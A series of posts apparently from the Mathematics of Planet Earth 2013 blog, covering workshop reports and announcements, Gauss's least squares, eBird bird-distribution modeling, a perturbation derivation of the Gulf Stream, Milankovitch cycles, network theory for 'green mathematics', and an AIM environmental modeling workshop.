    The week was highlighted by many interesting lectures which promoted significant dialogue and cross-pollination of ideas between the two communities.   These lectures were followed by lengthy moderated discussions which provided an opportunity for both sides to ask `naive’ questions and to formulate novel research problems and directions. This was a rare opportunity for both sides to interact in an informal setting.   

    In addition to the lectures of Mohammed Ziane and Joe Tribbia (see our previous post) some of the week’s talks included:

    1) Cecile Penland (NOAA) gave an overview of the current state of uncertainty quantification in operational weather models and discussed how these estimates could be improved with the use of more sophisticated stochastic methods.  Her lecture was a useful reminder to the mathematical community of the daunting complexity of the existing numerical models and  uneven quality of atmospheric data available.

    2) Boris Rozovskii (Brown) outlined recent developments in the use of wiener chaos expansions in the numerical and theoretical study of stochastic partial differential equations.  

    3) Antonio Navarra (Centro Euro-Mediterraneo sui Cambiamenti  Climatici)-Described recent developments in the use of Feynman path integrals to calculate probability distributions for certain stochastic climate models.

    4) David Neelin (UCLA) Discussed approaches to parameter estimation and sensitivity in precipitation models.

    5) Mickael Chekroun (UCLA/Hawaii) Introduced theoretical and practical approaches to Markov approximation of chaotic models. He discussed applications in his joint work with David Neelin.

    6) Franco Flandoli (Pisa) Overviewed the mathematical foundation of the Kolmogorov equations and discussed practical challenges for the computation of probability distributions for nonlinear Stochastic PDEs.

    7) Susan Friedlander (USC) Discussed recent developments in the  understanding of the inertial structure of the 3d Navier-Stokes equations and explained connections to turbulent flows.  Motivated by this work she also introduced some novel `shell models’ which permit the recovery of the fundamental statistical quantities arising in 3D turbulence theory.

    8) Armen Shirikyan (Université de Cergy-Pontoise, Paris)- Discussed ergodic and mixing properties of the stochastic and randomly kick forced 2d Navier-Stotkes equations and related models.  He also discussed normal approximation and large deviations for these models.

    9) Peter Kloeden (Goethe-Universität)-  Discussed theoretical and practical issues involved with the numerical simulation of finite and infinite dimensional stochastic equations using Taylor expansion methods.

    10) Nathan Glatt-Holtz (University of Minnesota/Virginia Tech)-  Discussed inviscid limits for stochastic fluids equations and relationships with Turbulence theory.

    Posted in Climate Modeling, Conference Report, Mathematics, Probability, Weather | Leave a comment

    2013 AARMS Mathematical Biology Workshop

    We are pleased to announce the 2013 AARMS Mathematical Biology Workshop to be held at Memorial University of Newfoundland, July 27-29, 2013, in St John’s, Newfoundland. Registration closes on May 17, 2013 and abstracts should be submitted by June 30, 2013.

    Plenary speakers:
    Edward Allen, Texas Tech University
    Linda Allen, Texas Tech University
    Steve Cantrell, University of Miami
    Odo Diekmann, Utrecht University
    Simon Levin, Princeton University
    Mark Lewis, University of Alberta
    Philip Maini, Oxford University

    Details at the conference website.

    Posted in Biology, Mathematics, Workshop Announcement | Leave a comment

    Asteroids

    The close approach of the asteroid that we have all read about in the newspapers represents something of a coincidence for me as I prepare for the data assimilation workshop in Banff this coming week. Gauss invented data assimilation as we know it for the purpose of calculating asteroid orbits. The orbit of an asteroid around the sun is determined by six parameters. Given observations of an asteroid, he chose the parameters that would minimize the sum of squared differences between the observed and predicted values. I don’t know whether he considered more complicated orbital calculations that would have taken the gravity fields of Jupiter or Mars into account. Why Gauss would have spent his time doing this I don’t know. Two centuries later, most data assimilation systems still rely on least squares.

    Some may question Gauss’ title as inventor of data assimilation, as Legendre did at the time. Eric Temple Bell, in one of his books, described an exchange of letters between Gauss and Legendre, in which Legendre pointed out that he had published the least squares method before Gauss’ paper on asteroid orbits appeared. Legendre humbly asked Gauss to acknowledge his proudest achievement. Surely Gauss, for all his great accomplishments, could acknowledge what Legendre described in a charming biblical reference as “My one ewe lamb.” Gauss refused, saying that he had, in fact, formulated the least squares method independently before Legendre. This turned out to be true. The least squares method appeared in Gauss’ notebooks before Legendre’s paper, but Legendre published first.

    It’s likely, though not certain, that the accounts in the media of the asteroid that recently passed within the orbits of our geostationary satellites are based on least squares calculations. There are alternatives. Someone once told me that the trajectory of the European Space Agency’s Ariane launch vehicle is calculated by probabilistic methods based on the theory of stochastic differential equations. I asked him how they did that, and he laughed and said “Oh, they will not tell you.” However they do it, it’s a hard calculation, probably impossible without electronic computing machinery, even given Gauss’ legendary calculating abilities.

    Robert Miller
    College of Earth, Ocean, and Atmospheric Sciences
    Oregon State University
    miller@coas.oregonstate.edu

    Posted in Astrophysics, Data Assimilation | Leave a comment

    Report on “Models and Methods in Ecology and Epidemiology (M2E2)”

    “Science without data is science-fiction”

    This was on of the boldest (if more facetious…) statements heard at the workshop “Models and Methods in Ecology and Epidemiology (M2E2)” held at CRM last week. Speakers from very diverse backgrounds presented a wide rage of mathematical models developed to better understand the dynamics and propagation mechanisms of, amongst others, Avian Flu, Lyme Disease and the West Nile virus. Throughout the presentations, the pervasive role played by data incorporation in the models was emphasized, and the equally important organization of model development as a team effort was underlined. The contribution of, amongst others, entomologists, ecologists and public health officials in formulating the realistic details of the dynamical models was a recurring theme. The mechanisms of data acquisitions need to be examined, as bias and uncertainty can hardly ever be underestimated, and new technologies must be explored for data acquisition to enhance its reliability: equipping wild birds with individual satellite transmitters was seen to significantly enhance our understanding of migratory routes. A recent development is the incorporation of social behavior in some of the disease propagation models, with the expansion of social media providing significant challenges to understand these literally human aspects.

    The scientific problems covered were broad, and the mathematical techniques employed equally comprehensive: finite-difference equations, differential equations as expected (some of the delayed variety, others in the more traditional PDE clothing), and the mathematical techniques employed, as well as the computing power required, equally broad: from essentially pencil-and-paper to supercomputing via GIS.

    For those of us with some experience in mathematical modeling, this is far from surprising: it just re-emphasizes the global scheme involved, as illustrated below [1].

    The analysis of the mathematical models, numerical of otherwise, is but a fraction of the process involved in bringing mathematics to bear on the solution of the challenging problems facing Planet Earth, in 2013 and for the foreseeable future.
    Indeed, there is more to Life than proving theorems.

    [1] J. Bélair, Chaos et complexité, modèles et métaphores: quelles leçons pour l’enseignement des mathématiques. In: Affronter la complexité: nouvel enjeu de l’enseignement des mathématiques, F. Caron (ed.), Proceedings of the Annual Meeting of the Québec Group of Mathematics Didacticians (2005), pp. 135-145.

    Posted in Conference Report, Disease Modeling, Ecology, Epidemiology, Mathematics | Leave a comment

    Earth from Space

    Perhaps you’ve seen this already, but it’s pretty amazing, and features some well-known faces: Earth from Space

    Sean Crowell
    Mathematics and Climate Research Network (MCRN)
    sean.m.crowell@gmail.com

    Posted in General | Leave a comment

    Bird Watchers and Big Data

    You would be forgiven for not initially recognizing some of the high-level similarities between the practice of research in sciences such as physics and research in ornithology. One basic similarity is that we are all constrained in what we can measure. Quantum physics has its uncertainty principle that describes limits on what can be measured. Ornithologists are at times limited in what they can measure by the very things that they are trying to observe: birds will sometimes actively avoid detection. Additionally, we all have to deal with imperfect measuring devices and the need to create calibrations for these devices. And we all need to do “big science” to find answers to some of our questions. In the case of ornithology, various groups are building sensor networks that span countries if not entire continents. It’s just that ornithologists call their sensors “bird watchers.”

    One of these ornithological sensor networks was prototyped roughly sixteen years ago across the United States and Canada, called the Great Backyard Bird Count (GBBC). It served to as a test platform for engaging the general public in reporting bird observations over a large geographical area, as well as the web systems needed to ingest and manage the information that was provided. While the GBBC still happens each year, engaging tens of thousands of people over a single long weekend in February, some of the GBBC’s participants keep counts and report on the birds that they see year-round, and from the GBBC a global bird-recording project emerged, named eBird. eBird collects a lot of data, thousands of lists of birds each day, at a rate fast enough that you can watch the data coming into the database).

    So, what do we do with all of those data? That’s where mathematics comes into the picture in a big way. As I already wrote, we know that the lists of birds that people report are not perfect records of the birds that were present. Some subset of the birds, and even entire species, almost certainly went undetected. We need to account for these uncertainties in what observers detect in order to get an accurate picture of where birds are living, and where they’re traveling. Sometimes we have enough background information to be able to write down the statistical equations that describe the processes that affect the detection of birds and the decisions that birds make about where to live. There are other times, however, when we do not know enough to be able to write down an accurate statistical model in advance, but instead we need to discover the appropriate model as part of our analyses of the information. In these instances, our analyses fall into the realm of data mining and machine learning.

    Using a novel machine-learning method, we are able to describe the distributions of bird species across the United States, accurately showing where species are found throughout the entire year. The map, below, is an example of the results. This map shows the distribution of a bird species called an Orchard Oriole that winter in Central and South America. In spring, most of these orioles fly across the Gulf of Mexico to reach the United States, where the migrants divide up into two distinct populations: one living in the eastern United States and a second population in the Great Plains states. Then in fall, both populations take a more westerly route back to their wintering grounds along the east coast of Mexico. Being able to accurately describe the seasonally-changing distribution of these orioles and other species of birds means that our machine-learning analyses were able to use information on characteristics of the environment, such as habitat, in order to identify the preferred habitats of birds as well as how these habitat preferences change over the course of a year. So, not only do these analyses tell us where birds are living, but these analyses also provide insights into the reasons why birds choose to live where they do.

    Animated map created by “The Cornell Lab of Ornithology”

    Knowing where birds live isn’t an end in itself. Being able to create an accurate map of a species’ distribution means that we understand something about that species’ habitat requirements. Additionally, knowledge of birds’ distributions, especially fine-grained descriptions of distributions, can have very practical applications. This observation was the basis for a very practical application: determining the extent to which different parties are responsible for conservation and management of different bird species. This effort, jointly undertaken by a number of governmental and non-governmental agencies, took the continent-wide range maps throughout the year and superimposed them on information about land ownership throughout the United States. The result was the first assessment of the extent to which many bird species were living on lands that were publicly or privately owned, and within the public lands the agencies most responsible for management were also identified. The product, the State of the Birds report for 2011, provided the first quantitative assessment of management responsibilities for a large number of species across their U.S. ranges.

    The computational work underlying the State of the Birds report is a final point of similarity between ornithology and other big-data sciences: all of the model building is well beyond the capacity of a desktop computer. Climatology, astronomy, and biomedical research all readily come to mind as areas of research that make heavy use of high-performance computer systems (or supercomputers) in which a larger task can be broken into many smaller pieces that are each handled by one of a large number of individual processing units. The building of hundreds of year-round, continent-wide bird distribution models lends itself to this same divide-and-conquer process, because the continent-wide distribution models are built from hundreds of sub-models that each describes environmental associations in a smaller region and narrow slice of time.

    The collection of citizen-science data in the Great Backyard Bird Count and eBird is only the start of a long process of gaining insights from these raw data. Extracting information from the data has required collaboration between ornithologists, statisticians, and computer scientists working together in the interface between biology and mathematics. As an ornithologist by training, it has been an interesting and exciting journey for me to travel.

    Wesley Hochachka

    Dr. Wesley Hochachka is a senior research associate at Cornell University, and the assistant director of the Bird Population Studies program at the Cornell Lab of Ornithology.

    Posted in Biology, Data Visualization | Leave a comment

    Workshop on “Mathematics of climate change, related hazards and risks”

    A 5-day workshop on “Mathematics of climate change, related hazards and risks” will be held at the Centro de Investigación en Matemáticas (CIMAT) in Guanajuato, Mexico, July 29-August 2, 2013. This workshop, organized as part of the global program Mathematics of Planet Earth 2013 (MPE2013), is a satellite workshop associated with the 2013 Mathematical Congress of the Americas (MCA).

    The workshop will bring together about 40 early career scientists, mainly from Central and Southern America, and nine distinguished scientists, each of whom will give several lectures on chosen topic. The workshop format will provide ample time for personal and group discussions and topical round tables to facilitate networking across the central themes of Natural Hazards research.

    Deadline for application to this workshop is March 31, 2013.

    Posted in Climate, Conference Announcement, Natural Disasters, Risk Analysis | 1 Comment

    There Will Always be a Gulf Stream — An Exercise in Singular Perturbation Technique

    One hears occasionally in the popular media that one possible consequence of global warming might be the disappearance of the Gulf Stream. This makes physical oceanographers cringe. The Gulf Stream and its analogs in other ocean basins exist for fundamental physical reasons. Climate change may well bring changes in the Gulf Stream. It may not be in the same place, may not be of the same strength or have the same temperature and salinity characteristics, but as long as the continents bound the great ocean basins, the sun shines, the earth turns toward the east and the wind blows in response, there will be a Gulf Stream. There will also be a Kuroshio, as the analogous current in the north Pacific is called, as well as the other western boundary currents, so called because, like the Gulf Stream, they form on the western boundaries of ocean basins.

    The dynamical description of the Gulf Stream can be found in just about any text on physical oceanography or geophysical fluid dynamics. I first learned the general outlines of ocean circulation as a young postdoc, when my mentor Allan Robinson walked into my office and dropped a copy of “The Gulf Stream” by Henry Stommel on my desk and said “Read this, cover to cover.” We’ve learned a great deal about western boundary currents in the fifty years since “The Gulf Stream” was published, but it’s still an excellent introduction to the subject and and a good read. “The Gulf Stream” is long out of print, but used copies can occasionally be found. I got mine at Powell’s for six bucks, with original dust jacket. Electronic versions in many formats can be found here.

    There are lots of places to learn about the wind driven ocean circulation. My purpose here is to present the fundamental picture as an exercise in perturbation technique.

    1. The beta-plane

    We model an ocean basin in Cartesian coordinates:

    \begin{eqnarray}
    (1)\qquad& x &= R \cos(\phi_0 )(\lambda – \lambda_0)\\
    (2)\qquad& y &= R (\phi – \phi_0)\\
    (3)\qquad& z &= r-R
    \end{eqnarray}

    where $(\phi , \lambda , r )$ are the coordinates of a point with latitude $\phi$, longitude $\lambda$ and distance $r$ from the center of the earth, and $R$ is the radius of the earth. $\phi_0$ and $\lambda_0$ are the latitude and longitude of a reference point in the mid-latitudes. We account for the rotation of the earth by the Coriolis parameter $f=2\Omega \sin\phi$, where the angular speed of rotation of the earth is $\Omega = 2\pi /86400s$. We approximate the Coriolis parameter as a linear function of latitude $f = f_0 + \beta y$. This is the only effect we will consider of the fact that the earth is round.

    2. The Reduced Gravity Model

    We model the density-stratified ocean as being composed of two immiscible fluids of slightly different densities in a stable configuration, i.e., the more dense fluid lying below the less dense one. In such a configuration, there is a family of waves that is much slower than the waves on the surface of a homogeneous fluid of the same depth would be. You’ve probably seen the effect in the clear plastic boxes containing different colored fluids, usually one clear and the other blue, that are sold as toys in stationery stores, or on the internet, e.g., here. When you tip the box you see waves propagate slowly along the interface. We simplify the two layer model further by assuming that the deeper layer is motionless, so the thickness of the upper layer adjusts in such a way as to make the pressure gradient vanish in the lower layer. The equations of motion for the upper layer are formally identical to the shallow water equations, but with the
    acceleration of gravity $g\approx 10 ms^{-2}$\ reduced by a factor of $\Delta \rho /\rho_0$, where $\rho_0$ is the density of the upper layer.

    The equations for steady linear flow on the $\beta$-plane for the reduced gravity model in the rectangle $x\in [0, a], y\in [0,b]$:

    \begin{eqnarray}
    (4)\qquad& -fhv + g^{\prime}hh_x &= -(\tau_0/\rho_0) \cos(\pi y/b) – A(uh)\\
    (5)\qquad& fhu + g^{\prime}hh_y &= -A(vh)\\
    (6)\qquad& (hu)_x + (hv)_y &= 0
    \end{eqnarray}

    $h$ is the thickness of the upper layer, $(u,v)$ are the horizontal velocity components and $g^{\prime}=g\Delta \rho / \rho_0$\ is the reduced gravity. The basin dimensions $a$ and $b$ are typically thousands of kilometers. We assume linear drag with constant drag coefficient $A$, and wind stress with amplitude $\tau_0$ in the $x-$direction only. The model defined by (4)-(6) is intended to be a schematic picture of a mid-latitude ocean basin in the northern hemisphere. The stress pattern of winds from the east in the southern half of the domain and from the west in the northern half is intended as a schematic model of the trade winds south of a relatively calm region at about $30^o N$, the horse latitudes, and westerly winds to the north.

    From the continuity equation (6), we can define a transport streamfunction:

    \begin{eqnarray}
    (7)\qquad& \psi_x &= hv; \quad \psi_y = -hu
    \end{eqnarray}

    The boundaries of our idealized ocean are assumed impermeable, so we choose $\psi = 0$ on the boundaries. Taking the curl of the momentum equations (5)-(6) leads to

    \begin{eqnarray}
    (8)\qquad& A\nabla^2 \psi + \beta \psi_x &= \frac{-\tau_0 \pi}{b\rho_0} \sin(\pi y/b)
    \end{eqnarray}

    Look for a separable solution of the form

    \begin{eqnarray}
    (9)\qquad& \psi &= F(x) \sin(\pi y/b)\\
    (10)\qquad& F^{\prime \prime} + \frac{\beta} {A} F^{\prime} – \frac{\pi^2}{b^2}F &= -\frac{\tau_0 \pi}{Ab\rho_0 }
    \end{eqnarray}

    So $F=\tau_0 b/(\pi \rho_0 A) +G$, and $G$ obeys the homogeneous equation

    \begin{eqnarray}
    (11)\qquad& G^{\prime \prime} + \frac{\beta}{A}F^{\prime} – \frac{\pi^2}{b^2} G &= 0
    \end{eqnarray}

    so $G = G_+ \exp(\lambda_+ x) + G_- \exp(\lambda_- x)$ for constants $G_+$ and $G_-$ where $\lambda_\pm = -\beta / (2A)(1 \pm (1+4\pi^2 A^2 /\beta^2)/b^2)^{1/2})$. This could be solved as a boundary value problem but it is more enlightening to rescale the problem.

    Scale (8) by $x\rightarrow x/L_x; y\rightarrow y/b$, so (8) becomes

    \begin{eqnarray}
    (12)\qquad& \frac{A}{\beta L_x}(\psi_{xx} + \frac{L_x^2}{b^2}\psi_{yy}) + \psi_x &= \left ( \frac{L_x}{b}\right ) \left ( \frac{-\tau_0 \pi}{\beta b \rho_0}\right ) \sin(\pi y)
    \end{eqnarray}

    For basin scale motions we may choose $L_x = b$. Dissipation in the ocean is very weak, so $A/(\beta b) \ll 1$ and the leftmost term in parentheses can be neglected, leaving

    \begin{eqnarray}
    (13)\qquad& \beta{hv} &= \frac{-\tau_0 \pi}{b\rho_0} \sin(\pi y/b)
    \end{eqnarray}

    where dimensions have been restored. This is a special case of the Sverdrup relation, $hv = \nabla \times (\tau^{(x)},\tau^{(y)})/\beta$, i.e., transport in the north-south direction is proportional to the curl of the wind stress. This is a good approximation in the interior, but (13) is a first-order equation and cannot satisfy the boundary conditions at the eastern and western boundaries, so the Sverdrup balance cannot hold uniformly. (Also, in this example, the transport in the interior of the basin is southward, and there must be a northward return flow) Near at least one of the boundaries the momentum balance must be different.

    Choose $\psi=0$ at $x=a$, so the interior solution is

    \begin{eqnarray}
    (14)\qquad& \psi &= \frac{\tau_0 \pi a}{\beta b \rho_0} \sin(\pi y /b)(1 -x/a)
    \end{eqnarray}

    We must now find an approximate solution to (8) in a thin strip near $x=0$ with $\psi (0,y) = 0$ and $\psi(x,y) \rightarrow ((\tau_0 \pi a)/(\beta b \rho_0)) \sin(\pi y /b)$ as $x\rightarrow \infty$. If we choose $L_x = A/\beta$, (12) becomes

    \begin{eqnarray}
    (15)\qquad& (\psi_{xx} + \frac{A^2}{\beta^2 b^2}\psi_{yy}) + \psi_x &= \left ( \frac{A}{\beta b}\right ) \left ( \frac{-\tau_0 \pi}{\beta b \rho_0}\right ) \sin(\pi y)
    \end{eqnarray}

    $A/(\beta b) \ll 1$ so to leading order, near the boundary, $\psi_{xx}+\psi_x = 0$ and $\psi = C_0 + C_1 \exp(-x)$ for constants $C_0$ and $C_1$. So, in dimension, near the boundary,

    \begin{eqnarray}
    (16)\qquad& \psi &= \frac{\tau_0 \pi}{\beta b \rho_0} \sin(\pi y)(1-e^{-x\beta /A}),
    \end{eqnarray}

    very close to Stommel’s solution. This boundary layer at $x=0$ is the analog, within our simple model, of the Gulf Stream.

    What would happen if we were to choose the interior solution as

    \begin{eqnarray}
    (17)\qquad& \psi &= \frac{\tau_0 \pi a}{\beta b \rho_0} \sin(\pi y /b)(-x/a)
    \end{eqnarray}

    and attempt to fit a boundary condition at $x=a$? It wouldn’t work. We would need to find $C_1$ and $C_2$ such that, in a neighborhood of the boundary, $\psi = C_0 + C_1 \exp(-x\beta /A)$ such that $\psi (x=a,y) = 0$ and $\psi (x,y) \rightarrow -((\tau_0 \pi a)/(\beta b \rho_0)) \sin(\pi y /b)$ as $x\rightarrow -\infty$, which is clearly impossible.

    So the fact that western boundary currents occur on the west side of ocean basins is a consequence of the fact that $\beta$ is positive, and western boundary currents form in the southern hemisphere as well.

    Robert Miller
    College of Earth, Ocean, and Atmospheric Sciences
    Oregon State University
    miller@coas.oregonstate.edu

    Posted in Geophysics, Mathematics, Ocean | Leave a comment

    “Models and Methods in Ecology, Epidemiology (M2E2)”

    A scientific workshop, as part of the pan-Canadian MPE2013 thematic
    program “Models and Methods in Ecology, Epidemiology and Public Health
    (M2E2)”, started at CRM today.

    The workshop, focusing on models and methods in ecology and epidemiology,
    was designed to initiate a conversation for the subsequent activities of
    the Pan-Canadian thematic year in the hope that some barriers might be
    broken between the practitioners of the different modeling techniques and
    approaches. An effort was made by the organizers (Jacques Bélair and
    Jianhong Wu) to engage geographically close and scientific
    expertise-diversified participants as well as participants of other
    planned workshops of the year, to insure that research collaborations will
    persist after this particular workshop, and that most if not all the
    modeling techniques to be addressed during the year will be at least
    partially explored at this workshop.

    The opening session of the workshop organizers presented a brief review of
    a few interdisciplinary research projects funded by two NCE centers
    (MITACS and GEOIDE) on mathematical contributions to addressing issues of
    major public health concern relevant to Lyme disease, avian influenza and
    West Nile virus. Some success has been made in developing an approach
    integrating lab test/experiment, bioinformatics, surveillance and
    statistical analysis, geo-simulations and mathematical modeling, but much
    challenge remains to develop and enhance large-scale interdisciplinary
    research capacity linking qualitative and fundamental sciences to public
    health policy decision making and practice.

    The main organizers of the pan-Candian thematic program are Frithjof
    Lutscher (U of Ottawa), Jacques Bélair (U de Montréal), Mark Lewis (U of
    Alberta), James Watmough (U of New Brunswick), and Jianhong Wu (York U).

    ————————————————————————

    Posted in Conference Report, Ecology, Epidemiology, General | Leave a comment

    A Personal “Day Zero” Experience

    I have been involved with MPE2013 activities since the first organizing workshop was held at AIM in March of 2011, not as a mathematician with MPE areas of interest, but more as an institute staff member helping to bring about workshops or lectures, or helping with the webpages.

    This has given me a bit of distance to observe the evolution of the initiative. One thing that I have noticed is that two years ago many of those involved were quick to point out that MPE2013 was not just about climate change or global warming, but about all the issues that face the planet. There was a real fear, or at least that was my perception, that saying too much about climate would be bad from a political standpoint. But it seems now that climate change is one of the topics that might help bring the real purpose of showcasing the role of mathematics in solving these problems to the forefront. And cautious mathematicians may be more wiling to publicly discuss the thorny issues that we need to talk about.

    To borrow a phrase from Malcom Glaldwell, it seems to me there has been a “tipping point” in the public acceptance of the reality of global warming. It is becoming part of our every day culture. Just in the last month, President Barack Obama mentioned climate change in his inaugural address. Certainly, while it may or may not be due to climate change, the horrific east coast storm season has caught our attention.There was a recent question about this in the “Ask Marilyn” column and last Thursday, the clue for 31 DOWN in the New York Times Crossword was “Global warming subj,” (the answer was ecol).

    My own real awakening came during Emily Shuckburgh’s talk at the Joint Mathematics Meeting in San Diego. This has already been the subject of one of these blogs, but I left that talk with a sense of urgency. We really do need to solve these major problems. This is not simply an academic exercise. When I saw Mary Lou Zeeman the day after the lecture we reflected on this. She said this is called “day zero,” the day in which one never thinks about the earth and climate change (and all the things that go along) in the same way again.

    Estelle Basor
    Deputy Director
    American Institute of Mathematics

    Posted in Climate Change, General | Leave a comment

    Paleoclimate Models

    Mathematics allows us to explain some of Earth’s past climates. Indeed, they are linked in particular to variations of the orbit of the Earth. While the movement of the Earth is not quasi-periodic (i.e., a superposition of periodic movements), mainly due to the gravitational influence of Jupiter and Saturn, some periodic oscillations of reasonably short period are well known and called the Milankovitch cycles. These cycles change the insolation (the incident solar radiation) of the Earth, and hence its climate. The Earth’s axis has a precession movement (it rotates around an axis perpendicular to the ecliptic) with a period of 26,000 years, but the major axis of the elliptic orbit also rotates. This combined effect changes the time of the year where the seasons occur, with a cycle of 21,000 years. The obliquity (tilt) of the Earth’s axis oscillates between 22.1 and 24.5 degrees, with a period of 41,000 years. The present obliquity is 23.44 degrees, and is decreasing. A decrease in the obliquity favors warmer winters and cooler summers and, globally, a glaciation. The eccentricity of the orbit of the Earth around the Sun varies from 0.005 to 0.058 with a mean value of 0.028, this being a superposition of cycles of periods from 100,000 years to 413,000 years. The present eccentricity is 0.017, and it is decreasing. Other cycles are superimposed on these. Modeling these variations in the Earth’s movements is part of celestial mechanics. While relativistic effects cannot always be neglected, the main methods come from dynamical systems. To understand the influence of the Milankovitch cycles on the climate, other tools are required, since oceans, land and atmosphere react differently to variations of the insolation.

    Posted in Climate Modeling, Paleoclimate | 1 Comment

    Prospects for a Green Mathematics

    It is increasingly clear that we are initiating a sequence of dramatic events across our planet. They include habitat loss, an increased rate of extinction, global warming, the melting of ice caps and permafrost, an increase in extreme weather events, gradually rising sea levels, ocean acidification, the spread of oceanic “dead zones,” a depletion of natural resources, and ensuing social strife.

    These events are all connected. They come from a way of life that views the Earth as essentially infinite, human civilization as a negligible perturbation, and exponential economic growth as a permanent condition. Deep changes will occur as these idealizations bring us crashing into the brick wall of reality. If we do not muster the will to act before things get significantly worse, we will need to do so later. While we may plead that it is “too difficult” or “too late,” this doesn’t matter: a transformation is inevitable. All we can do is start where we find ourselves, and begin adapting to life on a finite-sized planet.

    Where does mathematics fit into all this? While the problems we face have deep roots, major transformations in society have always caused and been helped along by revolutions in mathematics. Starting near the end of the last ice age, the Agricultural Revolution eventually led to the birth of written numerals and geometry. Centuries later, the Industrial Revolution brought us calculus, and eventually a flowering of mathematics unlike any before. Now, as the 21st century unfolds, mathematics will become increasingly driven by our need to understand the biosphere and our role within it.

    We refer to mathematics suitable for understanding the biosphere as green mathematics. Although it is just being born, we can already see some of its outlines.

    Since the biosphere is a massive network of interconnected elements, we expect network theory will play an important role in green mathematics. Network theory is a sprawling field, just beginning to become organized, which combines ideas from graph theory, probability theory, biology, ecology, sociology and more. Computation plays an important role here, both because it has a network structure—think of networks of logic gates—and because it provides the means for simulating networks.

    One application of network theory is to tipping points, where a system abruptly passes from one regime to another. Scientists need to identify nearby tipping points in the biosphere to help policy makers to head off catastrophic changes. Mathematicians, in turn, are challenged to develop techniques for detecting incipient tipping points. Another application of network theory is the study of shocks and resilience. When can a network recover from a major blow to one of its subsystems?

    We claim that network theory is not just another name for biology, ecology, or any other existing science, because in it we can see new mathematical terrains. Here are two examples.

    First, consider a leaf. In The Formation of a Tree Leaf by Qinglan Xia, we see a possible key to Nature’s algorithm for the growth of leaf veins. The vein system, which is a transport network for nutrients and other substances, is modeled by Xia as a directed graph with nodes for cells and edges for the “pipes” that connect the cells. Each cell gives a revenue of energy, and incurs a cost for transporting substances to and from it.

    The total transport cost depends on the network structure. There are costs for each of the pipes, and costs for turning the fluid around the bends. For each pipe, the cost is proportional to the product of its length, its cross-sectional area raised to a power α, and the number of leaf cells that it feeds. The exponent α captures the savings from using a thicker pipe to transport materials together. Another parameter β expresses the turning cost.

    Development proceeds through cycles of growth and network optimization. During growth, a layer of cells gets added, containing each potential cell with a revenue that would exceed its cost. During optimization, the graph is adjusted to find a local cost minimum. Remarkably, by varying α and β, simulations yield leaves resembling those of specific plants, such as maple or mulberry.


    A growing network.

    Unlike approaches that merely create pretty images resembling leaves, Xia presents an algorithmic model, simplified yet illuminating, of how leaves actually develop. It is a network-theoretic approach to a biological subject, and it is mathematics—replete with lemmas, theorems and algorithms—from start to finish.

    A second example comes from stochastic Petri nets, which are a model for networks of reactions. In a stochastic Petri net, entities are designated by “tokens” and entity types by “places” which hold the tokens. “Reactions” remove tokens from their input places and deposit tokens at their output places. The reactions fire probabilistically, in a Markov chain where each reaction rate depends on the number of its input tokens.


    A stochastic Petri net.

    Perhaps surprisingly, many techniques from quantum field theory are transferable to stochastic Petri nets. The key is to represent stochastic states by power series. Monomials represent pure states, which have a definite number of tokens at each place. Each variable in the monomial stands for a place, and its exponent indicates the token count. In a linear combination of monomials, each coefficient represents the probability of being in the associated state.

    In quantum field theory, states are representable by power series with complex coefficients. The annihilation and creation of particles are cast as operators on power series. These same operators, when applied to the stochastic states of a Petri net, describe the annihilation and creation of tokens. Remarkably, the commutation relations between annihilation and creation operators, which are often viewed as a hallmark of quantum theory, make perfect sense in this classical probabilistic context.

    Each stochastic Petri net has a “Hamiltonian” which gives its probabilistic law of motion. It is built from the annihilation and creation operators. Using this, one can prove many theorems about reaction networks, already known to chemists, in a compact and elegant way. See the Azimuth network theory series for details.

    Conclusion: The life of a network, and the networks of life, are brimming with mathematical content.

    We are pursuing these subjects in the Azimuth Project, an open collaboration between mathematicians, scientists, engineers and programmers trying to help save the planet. On the Azimuth Wiki and Azimuth Blog we are trying to explain the main environmental and energy problems the world faces today. We are also studying plans of action, network theory, climate cycles, the programming of climate models, and more.

    If you would like to help, we need you and your special expertise. You can write articles, contribute information, pose questions, fill in details, write software, help with research, help with writing, and more. Just drop us a line, either here or on the Azimuth Blog.

    John Baez and David Tanzer

    Posted in Biosphere, Mathematics | 1 Comment

    Mathematicians at AIM tackle problems related to our environment

    Prepared by Ali Nadim (Claremont Graduate University) and Ami Radunskaya (Pomona College)

    What do green buildings, environmental toxins, sources of ozone pollution in the atmosphere, and infrastructure planning for electrical power have in common? They were all topics of intense study at a workshop on “Modeling Problems Related to our Environment,” which took place at the American Institute of Mathematics (AIM) in Palo Alto, CA, during the week of January 14th. This workshop operated in a format similar to the Math-in-Industry Study Groups in which the problems are introduced on the first day by liaisons from industry, the participants then divide into teams and spend the week working on the problems — with frequent gatherings for progress reports accompanied by high-quality refreshments! — and each team presents its “solution” to the problem on the last day.

    One of the projects at the workshop dealt with thermal management of green buildings, brought by the architectural firm EHDD of San Francisco. A frontier in design and manufacture of houses is the so-called “passive house” or its original European counterpart “passivhaus” movement where, through a combination of air-tight construction and smart insulation, residential houses as well as office and lab buildings can be designed that use minimal (nearly zero) energy for heating and cooling. Just the presence of a few warm bodies (e.g., humans) and the typical lighting and appliances in the house are enough to heat it to a comfortable temperature, even in the relatively cool northern European climate. The group at the workshop put together a mathematical model of such a house, accounting for heating by the incident sunlight and the internal sources (appliances and people), as well as for the controlled ventilation, convection to the outside air, and heat transfer through windows and to/from the ground. Perhaps not surprisingly, it turned out that for a well-insulated house, it was indeed possible to achieve a comfortable indoor temperature without needing an actual furnace or heater.

    HoTS Example

    HoTS (HOuse Thermal Simulator) – Example


    The team also investigated the use of phase-change materials as part of the insulation to see their effect on increasing the thermal mass of the house without impacting its actual physical mass. Upon adding some bells and whistles, the thermal simulator developed at the workshop can potentially be used by designers to better assess the thermal characteristics of a given house, given its solar exposure, wall and window materials, etc.

    Another workshop project, brought by the US Environmental Protection Agency (EPA), focused on the problem of “source apportionment” for atmospheric ozone. It turns out that the amount of ozone in the troposphere is dictated by the amounts of multiple precursor chemicals (mainly nitrogen oxides and volatile organic compounds), each originating at distributed locations in space and time, as well as by exposure to sunlight during the daytime hours. The series of chemical reactions leading to ozone formation are extremely complex and nonlinear, and are coupled to atmospheric transport by convection and turbulent diffusion. The goal of the EPA as a regulating agency is to assess which of the many potential sources of the precursor chemicals (emissions from cars, factories, etc.) is the contributor to the measured ozone levels at various locations and times. This is a very challenging inverse problem. The team at the workshop proposed various approaches to this problem using Proper Orthogonal Decomposition and sensitivity analysis methods, and it also studied ways of further simplifying the mathematical description of the complex nonlinear chemistry by trying to identify and eliminate (from the model) those intermediaries that do not play as big a role in the overall kinetics of ozone production.

